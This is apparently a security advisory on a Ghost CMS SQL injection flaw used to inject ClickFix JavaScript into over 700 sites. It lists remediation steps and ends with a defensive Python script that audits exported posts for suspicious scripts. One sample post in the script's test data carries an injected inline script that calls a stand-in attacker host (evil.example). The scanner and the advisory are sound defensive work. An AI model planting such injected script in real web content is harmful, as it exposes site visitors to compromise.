Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks

Ghost CMS CVE-2026-26980 (CVSS 9.4) is being actively exploited to compromise 700+ sites with ClickFix malware. Upgrade to 6.19.1 and rotate all credentials now.

What’s new: A critical SQL injection vulnerability (CVE-2026-26980, CVSS score: 9.4) in Ghost CMS has been exploited to hijack over 700 websites for ClickFix social engineering attacks. The flaw allows unauthenticated attackers to access the admin API key, enabling injection of malicious JavaScript into site articles. Compromised sectors include universities, blockchain, AI, SaaS, security research, media, and fintech. The vulnerability was patched in Ghost CMS version 6.19.1, released in February 2026.

Who’s affected

Any Ghost CMS installation running a version earlier than 6.19.1 is vulnerable. Over 700 sites have already been confirmed compromised, spanning a broad range of industries and regions.

What to do

  • Upgrade Ghost CMS to version 6.19.1 or newer immediately.
  • Rotate all admin credentials and API keys associated with your Ghost instance.
  • Audit access logs for suspicious API calls or unexpected JavaScript injections in published articles.
  • Notify users who may have visited affected pages during the compromise window to be alert for ClickFix lures.
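For the audit step above, an added defensive check that is not from the advisory or from the Ghost project: a small Python scan over exported post bodies that flags inline scripts and scripts loaded from hosts outside an allowlist. The allowlist, the sample posts and the assumed post shape (`title` plus `html`, as in Ghost's JSON export) are constructed here.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: script hosts the site legitimately loads from (assumption, adjust per site).
TRUSTED_SCRIPT_HOSTS = {"cdn.example-analytics.net"}

class ScriptFinder(HTMLParser):
    """Collect every <script> in a post body: its src (if any) and its inline text."""
    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None  # the <script> being parsed, or None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "inline": ""}

    def handle_data(self, data):
        if self._current is not None:  # HTMLParser passes <script> bodies here verbatim
            self._current["inline"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None

def suspicious_scripts(post_html):
    """Flag inline scripts and scripts loaded from hosts outside the allowlist."""
    finder = ScriptFinder()
    finder.feed(post_html)
    finder.close()
    flagged = []
    for s in finder.scripts:
        if s["src"] is None:
            flagged.append(("inline", s["inline"].strip()[:80]))
        elif (urlparse(s["src"]).hostname or "") not in TRUSTED_SCRIPT_HOSTS:
            flagged.append(("external", s["src"]))
    return flagged

def audit_posts(posts):
    # posts: dicts with 'title' and 'html' (assumed shape of Ghost's export data.posts)
    return {p["title"]: hits for p in posts if (hits := suspicious_scripts(p["html"]))}

# Constructed sample posts: clean, allowlisted CDN script, and one carrying an injected inline script.
SAMPLE_POSTS = [
    {"title": "Release notes", "html": "<p>Version 6.19.1 is out.</p>"},
    {"title": "Metrics", "html": '<script src="https://cdn.example-analytics.net/a.js"></script><p>ok</p>'},
    {"title": "Welcome", "html": '<p>Hi</p><script>fetch("https://evil.example/l")</script>'},
]
```

Run `audit_posts` over the `posts` array of a Ghost export taken after the upgrade; any title it reports deserves a manual look at the stored HTML, since legitimate content rarely carries inline scripts.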

Sources